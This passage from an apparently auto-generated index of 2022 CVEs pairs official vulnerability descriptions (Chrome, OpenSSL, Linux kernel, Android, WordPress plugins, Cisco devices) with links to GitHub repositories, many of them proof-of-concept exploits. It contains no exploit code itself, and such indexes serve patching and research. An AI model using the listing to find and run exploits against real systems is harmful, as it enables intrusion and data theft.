- [cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786](https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786)
### CVE-2022-3656 (2022-11-01)
Insufficient data validation in File System in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Medium)
- [momika233/CVE-2022-3656](https://github.com/momika233/CVE-2022-3656)
### CVE-2022-3699 (2023-10-24)
\nA privilege escalation vulnerability was reported in the Lenovo HardwareScanPlugin prior to version 1.3.1.2 and Lenovo Diagnostics prior to version 4.45\n\n\n\n that could allow a local user to execute code with elevated privileges.
- [alfarom256/CVE-2022-3699](https://github.com/alfarom256/CVE-2022-3699)
- [estimated1337/lenovo_exec](https://github.com/estimated1337/lenovo_exec)
- [Eap2468/CVE-2022-3699](https://github.com/Eap2468/CVE-2022-3699)
### CVE-2022-3786 (2022-11-01)
A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed a malicious certificate or for an application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the `.' character (decimal 46) on the stack. This buffer overflow could result in a crash (causing a denial of service). In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects.\n\n
- [WhatTheFuzz/openssl-fuzz](https://github.com/WhatTheFuzz/openssl-fuzz)
### CVE-2022-3904 (2023-01-16)
The MonsterInsights WordPress plugin before 8.9.1 does not sanitize or escape page titles in the top posts/pages section, allowing an unauthenticated attacker to inject arbitrary web scripts into the titles by spoofing requests to google analytics.
- [RandomRobbieBF/CVE-2022-3904](https://github.com/RandomRobbieBF/CVE-2022-3904)
### CVE-2022-3910 (2022-11-22)
Use After Free vulnerability in Linux Kernel allows Privilege Escalation. An improper Update of Reference Count in io_uring leads to Use-After-Free and Local Privilege Escalation.\nWhen io_msg_ring was invoked with a fixed file, it called io_fput_file() which improperly decreased its reference count (leading to Use-After-Free and Local Privilege Escalation). Fixed files are permanently registered to the ring, and should not be put separately.\n\nWe recommend upgrading past commit https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679 https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679 \n
- [veritas501/CVE-2022-3910](https://github.com/veritas501/CVE-2022-3910)
- [TLD1027/CVE-2022-3910](https://github.com/TLD1027/CVE-2022-3910)
### CVE-2022-3942 (2022-11-11)
A vulnerability was found in SourceCodester Sanitization Management System and classified as problematic. This issue affects some unknown processing of the file php-sms/?p=request_quote. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-213449 was assigned to this vulnerability.
- [maikroservice/CVE-2022-3942](https://github.com/maikroservice/CVE-2022-3942)
### CVE-2022-3949 (2022-11-11)
A vulnerability, which was classified as problematic, has been found in Sourcecodester Simple Cashiering System. This issue affects some unknown processing of the component User Account Handler. The manipulation of the argument fullname leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-213455.
- [maikroservice/CVE-2022-3949](https://github.com/maikroservice/CVE-2022-3949)
### CVE-2022-3992 (2022-11-14)
A vulnerability classified as problematic was found in SourceCodester Sanitization Management System. Affected by this vulnerability is an unknown functionality of the file admin/?page=system_info of the component Banner Image Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-213571.
- [Urban4/CVE-2022-3992](https://github.com/Urban4/CVE-2022-3992)
### CVE-2022-4047 (2022-12-26)
The Return Refund and Exchange For WooCommerce WordPress plugin before 4.0.9 does not validate attachment files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files such as PHP and lead to RCE
- [im-hanzou/WooRefer](https://github.com/im-hanzou/WooRefer)
- [entroychang/CVE-2022-4047](https://github.com/entroychang/CVE-2022-4047)
### CVE-2022-4060 (2023-01-16)
The User Post Gallery WordPress plugin through 2.19 does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it.
- [im-hanzou/UPGer](https://github.com/im-hanzou/UPGer)
### CVE-2022-4061 (2022-12-19)
The JobBoardWP WordPress plugin before 1.2.2 does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP.
- [im-hanzou/JBWPer](https://github.com/im-hanzou/JBWPer)
### CVE-2022-4063 (2022-12-19)
The InPost Gallery WordPress plugin before 2.1.4.1 insecurely uses PHP's extract() function when rendering HTML views, allowing attackers to force the inclusion of malicious files & URLs, which may enable them to run code on servers.
- [im-hanzou/INPGer](https://github.com/im-hanzou/INPGer)
### CVE-2022-4096 (2022-11-21)
Server-Side Request Forgery (SSRF) in GitHub repository appsmithorg/appsmith prior to 1.8.2.
- [aminetitrofine/CVE-2022-4096](https://github.com/aminetitrofine/CVE-2022-4096)
### CVE-2022-4262 (2022-12-02)
Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
- [bjrjk/CVE-2022-4262](https://github.com/bjrjk/CVE-2022-4262)
- [mistymntncop/CVE-2022-4262](https://github.com/mistymntncop/CVE-2022-4262)
- [quangnh89/CVE-2022-4262](https://github.com/quangnh89/CVE-2022-4262)
### CVE-2022-4304 (2023-02-08)
A timing based side channel exists in the OpenSSL RSA Decryption implementation\nwhich could be sufficient to recover a plaintext across a network in a\nBleichenbacher style attack. To achieve a successful decryption an attacker\nwould have to be able to send a very large number of trial messages for\ndecryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,\nRSA-OEAP and RSASVE.\n\nFor example, in a TLS connection, RSA is commonly used by a client to send an\nencrypted pre-master secret to the server. An attacker that had observed a\ngenuine connection between a client and a server could use this flaw to send\ntrial messages to the server and record the time taken to process them. After a\nsufficiently large number of messages the attacker could recover the pre-master\nsecret used for the original connection and thus be able to decrypt the\napplication data sent over that connection.\n\n
- [Trinadh465/Openssl-1.1.1g_CVE-2022-4304](https://github.com/Trinadh465/Openssl-1.1.1g_CVE-2022-4304)
### CVE-2022-4395 (2023-01-30)
The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.
- [MrG3P5/CVE-2022-4395](https://github.com/MrG3P5/CVE-2022-4395)
### CVE-2022-4510 (2023-01-25)
\nA path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins.\n This vulnerability is associated with program files src/binwalk/plugins/unpfs.py.\n\nThis issue affects binwalk from 2.1.2b through 2.3.3 included.\n\n
- [electr0sm0g/CVE-2022-4510](https://github.com/electr0sm0g/CVE-2022-4510)
- [adhikara13/CVE-2022-4510-WalkingPath](https://github.com/adhikara13/CVE-2022-4510-WalkingPath)
- [Kalagious/BadPfs-CVE-2022-4510](https://github.com/Kalagious/BadPfs-CVE-2022-4510)
### CVE-2022-4539 (2024-08-31)
The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.
- [Abdurahmon3236/CVE-2022-4539](https://github.com/Abdurahmon3236/CVE-2022-4539)
### CVE-2022-4543 (2023-01-11)
A flaw named "EntryBleed" was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems.
- [sunichi/cve-2022-4543-wrapper](https://github.com/sunichi/cve-2022-4543-wrapper)
### CVE-2022-4611 (2022-12-19)
Es wurde eine problematische Schwachstelle in Click Studios Passwordstate and Passwordstate Browser Extension Chrome gefunden. Dabei betrifft es einen unbekannter Codeteil. Mit der Manipulation mit unbekannten Daten kann eine hard-coded credentials-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [Phamchie/CVE-2022-4611](https://github.com/Phamchie/CVE-2022-4611)
- [fgsoftware1/CVE-2022-4611](https://github.com/fgsoftware1/CVE-2022-4611)
### CVE-2022-4616 (2023-01-12)
The webserver in Delta DX-3021 versions prior to 1.24 is vulnerable to \ncommand injection through the network diagnosis page. This vulnerability\n could allow a remote unauthenticated user to add files, delete files, \nand change file permissions.\n\n
- [ahanel13/CVE-2022-4616-POC](https://github.com/ahanel13/CVE-2022-4616-POC)
### CVE-2022-4896 (2023-09-12)
Cyber Control, in its 1.650 version, is affected by a vulnerability in the generation on the server of pop-up windows with the messages "PNTMEDIDAS", "PEDIR", "HAYDISCOA" or "SPOOLER". A complete denial of service can be achieved by sending multiple requests simultaneously on a core.
- [sapellaniz/CVE-2022-4896](https://github.com/sapellaniz/CVE-2022-4896)
### CVE-2022-4939 (2023-04-05)
THe WCFM Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 2.10.0, due to a missing capability check on the wp_ajax_nopriv_wcfm_ajax_controller AJAX action that controls membership settings. This makes it possible for unauthenticated attackers to modify the membership registration form in a way that allows them to set the role for registration to that of any user including administrators. Once configured, the attacker can then register as an administrator.
- [BaconCriCRi/PoC-CVE-2022-4939-](https://github.com/BaconCriCRi/PoC-CVE-2022-4939-)
### CVE-2022-4944 (2023-04-22)
Eine problematische Schwachstelle wurde in kalcaddle KodExplorer bis 4.49 entdeckt. Davon betroffen ist unbekannter Code. Durch Manipulation mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 4.50 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [brosck/CVE-2022-4944](https://github.com/brosck/CVE-2022-4944)
### CVE-2022-5561
- [Kvi74/CVE-2022-5561](https://github.com/Kvi74/CVE-2022-5561)
### CVE-2022-8475
- [Kvi74/CVE-2022-8475](https://github.com/Kvi74/CVE-2022-8475)
### CVE-2022-10270
- [baimaobg/sunflower_exp](https://github.com/baimaobg/sunflower_exp)
### CVE-2022-14733
- [hkzck/CVE-2022-14733](https://github.com/hkzck/CVE-2022-14733)
### CVE-2022-20004 (2022-05-10)
In checkSlicePermission of SliceManagerService.java, it is possible to access any slice URI due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-179699767
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004)
### CVE-2022-20005 (2022-05-10)
In validateApkInstallLocked of PackageInstallerSession.java, there is a way to force a mismatch between running code and a parsed APK . This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-219044664
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005)
### CVE-2022-20007 (2022-05-10)
In startActivityForAttachedApplicationIfNeeded of RootWindowContainer.java, there is a possible way to overlay an app that believes it's still in the foreground, when it is not, due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-211481342
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007)
- [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007)
### CVE-2022-20009 (2022-05-10)
In various functions of the USB gadget subsystem, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-213172319References: Upstream kernel
- [szymonh/android-gadget](https://github.com/szymonh/android-gadget)
### CVE-2022-20126 (2022-06-15)
In setScanMode of AdapterService.java, there is a possible way to enable Bluetooth discovery mode without user interaction due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-203431023
- [Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126](https://github.com/Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126)
### CVE-2022-20128
- [irsl/CVE-2022-20128](https://github.com/irsl/CVE-2022-20128)
### CVE-2022-20130 (2022-06-15)
In transportDec_OutOfBandConfig of tpdec_lib.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-224314979
- [Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130](https://github.com/Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130)
### CVE-2022-20138 (2022-06-15)
In ACTION_MANAGED_PROFILE_PROVISIONED of DevicePolicyManagerService.java, there is a possible way for unprivileged app to send MANAGED_PROFILE_PROVISIONED intent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-210469972
- [ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138)
### CVE-2022-20140 (2022-06-15)
In read_multi_rsp of gatt_sr.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-227618988
- [RenukaSelvar/system_bt_aosp10_cve-2022-20140](https://github.com/RenukaSelvar/system_bt_aosp10_cve-2022-20140)
### CVE-2022-20142 (2022-06-15)
In createFromParcel of GeofenceHardwareRequestParcelable.java, there is a possible arbitrary code execution due to parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-216631962
- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142)
- [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142)
### CVE-2022-20186 (2022-06-15)
In kbase_mem_alias of mali_kbase_mem_linux.c, there is a possible arbitrary code execution due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-215001024References: N/A
- [Bariskizilkaya/CVE-2022-20186_CTXZ](https://github.com/Bariskizilkaya/CVE-2022-20186_CTXZ)
- [SmileTabLabo/CVE-2022-20186](https://github.com/SmileTabLabo/CVE-2022-20186)
### CVE-2022-20223 (2022-07-13)
In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-223578534
- [xbee9/cve-2022-20223](https://github.com/xbee9/cve-2022-20223)
### CVE-2022-20224 (2022-07-13)
In AT_SKIP_REST of bta_hf_client_at.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure in the Bluetooth stack with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-220732646
- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224)
- [hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224)
### CVE-2022-20229 (2022-07-13)
In bta_hf_client_handle_cind_list_item of bta_hf_client_at.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-224536184
- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229)
### CVE-2022-20338 (2022-08-11)
In HierarchicalUri.readFrom of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to a local escalation of privilege, preventing processes from validating URIs correctly, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12LAndroid ID: A-171966843
- [Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338](https://github.com/Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338)
- [Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338)
### CVE-2022-20347 (2022-08-09)
In onAttach of ConnectedDeviceDashboardFragment.java, there is a possible permission bypass due to a confused deputy. This could lead to remote escalation of privilege in Bluetooth settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-228450811
- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347)
- [hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347)
### CVE-2022-20360 (2022-08-09)
In setChecked of SecureNfcPreferenceController.java, there is a missing permission check. This could lead to local escalation of privilege from the guest user with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-228314987
- [726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360](https://github.com/726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)
### CVE-2022-20361 (2022-08-09)
In btif_dm_auth_cmpl_evt of btif_dm.cc, there is a possible vulnerability in Cross-Transport Key Derivation due to Weakness in Bluetooth Standard. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-231161832
- [francozappa/blur](https://github.com/francozappa/blur)
### CVE-2022-20409 (2022-10-11)
In io_identity_cow of io_uring.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238177383References: Upstream kernel
- [Markakd/bad_io_uring](https://github.com/Markakd/bad_io_uring)
### CVE-2022-20413 (2022-10-11)
In start of Threads.cpp, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-235850634
- [pazhanivel07/frameworks_av-r33_CVE-2022-20413](https://github.com/pazhanivel07/frameworks_av-r33_CVE-2022-20413)
### CVE-2022-20421 (2022-10-11)
In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630375References: Upstream kernel
- [0xkol/badspin](https://github.com/0xkol/badspin)
### CVE-2022-20452 (2022-11-08)
In initializeFromParcelLocked of BaseBundle.java, there is a possible method arbitrary code execution due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-240138318
- [michalbednarski/LeakValue](https://github.com/michalbednarski/LeakValue)
### CVE-2022-20456 (2023-01-24)
In AutomaticZenRule of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703780
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456)
### CVE-2022-20470 (2022-12-13)
In bindRemoteViewsService of AppWidgetServiceImpl.java, there is a possible way to bypass background activity launch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-234013191
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470)
### CVE-2022-20473 (2022-12-13)
In toLanguageTag of LocaleListCache.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-239267173
- [Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473)
- [Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473)
### CVE-2022-20489 (2023-01-24)
In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703460
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old)
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489)
### CVE-2022-20490 (2023-01-24)
In multiple functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242703505
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490)
### CVE-2022-20492 (2023-01-24)
In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242704043
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492)
### CVE-2022-20493 (2023-01-24)
In Condition of Condition.java, there is a possible way to grant notification access due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242846316
- [Trinadh465/frameworks_base_CVE-2022-20493](https://github.com/Trinadh465/frameworks_base_CVE-2022-20493)
### CVE-2022-20494 (2023-01-24)
In AutomaticZenRule of AutomaticZenRule.java, there is a possible persistent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243794204
- [Supersonic/CVE-2022-20494](https://github.com/Supersonic/CVE-2022-20494)
### CVE-2022-20607 (2022-12-16)
In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N/A
- [sumeetIT/CVE-2022-20607](https://github.com/sumeetIT/CVE-2022-20607)
### CVE-2022-20699 (2022-02-10)
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
- [Audiobahn/CVE-2022-20699](https://github.com/Audiobahn/CVE-2022-20699)
- [puckiestyle/CVE-2022-20699](https://github.com/puckiestyle/CVE-2022-20699)
- [rohan-flutterint/CVE-2022-20699](https://github.com/rohan-flutterint/CVE-2022-20699)
### CVE-2022-20818 (2022-09-30)
Multiple vulnerabilities in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to gain elevated privileges. These vulnerabilities are due to improper access controls on commands within the application CLI. An attacker could exploit these vulnerabilities by running a malicious command on the application CLI. A successful exploit could allow the attacker to execute arbitrary commands as the root user.
- [mbadanoiu/CVE-2022-20818](https://github.com/mbadanoiu/CVE-2022-20818)
### CVE-2022-20829 (2022-06-24)
A vulnerability in the packaging of Cisco Adaptive Security Device Manager (ASDM) images and the validation of those images by Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker with administrative privileges to upload an ASDM image that contains malicious code to a device that is running Cisco ASA Software. This vulnerability is due to insufficient validation of the authenticity of an ASDM image during its installation on a device that is running Cisco ASA Software. An attacker could exploit this vulnerability by installing a crafted ASDM image on the device that is running Cisco ASA Software and then waiting for a targeted user to access that device using ASDM. A successful exploit could allow the attacker to execute arbitrary code on the machine of the targeted user with the privileges of that user on that machine. Notes: To successfully exploit this vulnerability, the attacker must have administrative privileges on the device that is running Cisco ASA Software. Potential targets are limited to users who manage the same device that is running Cisco ASA Software using ASDM. Cisco has released and will release software updates that address this vulnerability.
- [jbaines-r7/theway](https://github.com/jbaines-r7/theway)
### CVE-2022-20866 (2022-08-10)
A vulnerability in the handling of RSA keys on devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve an RSA private key. This vulnerability is due to a logic error when the RSA key is stored in memory on a hardware platform that performs hardware-based cryptography. An attacker could exploit this vulnerability by using a Lenstra side-channel attack against the targeted device. A successful exploit could allow the attacker to retrieve the RSA private key. The following conditions may be observed on an affected device: This vulnerability will apply to approximately 5 percent of the RSA keys on a device that is running a vulnerable release of Cisco ASA Software or Cisco FTD Software; not all RSA keys are expected to be affected due to mathematical calculations applied to the RSA key. The RSA key could be valid but have specific characteristics that make it vulnerable to the potential leak of the RSA private key. If an attacker obtains the RSA private key, they could use the key to impersonate a device that is running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic. See the Indicators of Compromise section for more information on the detection of this type of RSA key. The RSA key could be malformed and invalid. A malformed RSA key is not functional, and a TLS client connection to a device that is running Cisco ASA Software or Cisco FTD Software that uses the malformed RSA key will result in a TLS signature failure, which means a vulnerable software release created an invalid RSA signature that failed verification. If an attacker obtains the RSA private key, they could use the key to impersonate a device that is running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic.
- [CiscoPSIRT/CVE-2022-20866](https://github.com/CiscoPSIRT/CVE-2022-20866)
### CVE-2022-21241 (2022-02-08)
Cross-site scripting vulnerability in CSV+ prior to 0.8.1 allows a remote unauthenticated attacker to inject an arbitrary script or an arbitrary OS command via a specially crafted CSV file that contains HTML a tag.
- [satoki/csv-plus_vulnerability](https://github.com/satoki/csv-plus_vulnerability)
### CVE-2022-21306 (2022-01-19)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [hktalent/CVE-2022-21306](https://github.com/hktalent/CVE-2022-21306)
### CVE-2022-21340 (2022-01-19)
